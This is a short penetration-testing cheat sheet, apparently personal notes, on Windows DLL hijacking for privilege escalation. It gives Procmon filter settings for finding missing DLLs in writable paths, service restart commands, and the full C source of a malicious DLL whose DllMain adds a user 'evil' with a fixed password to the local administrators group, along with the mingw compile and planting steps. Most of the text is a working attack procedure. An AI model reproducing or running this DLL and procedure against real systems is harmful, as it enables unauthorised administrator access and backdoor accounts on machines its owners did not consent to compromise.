Run Procmon as administrator in rdp session

Add filters

• Result - is - NAME NOT FOUND - Include - click add
• Path - ends with - .dll - include - click add
• .apply and okay

cmd.exe

• sc stop dllsvc or servicename
  • or sc.exe stop dllsvc
• sc start dllsvc
• OR net stop <servicename>
• net start <servicename>

Now procmon will show more output

Check for any .dll file path which is writable

Now create same .dll file using windows_dll.c script in kali

<aside> 👨‍💻 // For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll // For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { if (dwReason == DLL_PROCESS_ATTACH) { //or we can add a new user to administrator group system("cmd.exe /k net user evil pass1234 /add"); system("cmd.exe /k net localgroup administrators evil /add"); ExitProcess(0); } return TRUE; }

</aside>

• x86_64-w64-mingw32-gcc windows_dll.c -shared -o <vuln-dll>.dll

transfer .dll to wrtable location found on Procmon

sc stop dllsvc & sc start dllsvc

now evil user has been added in administrator group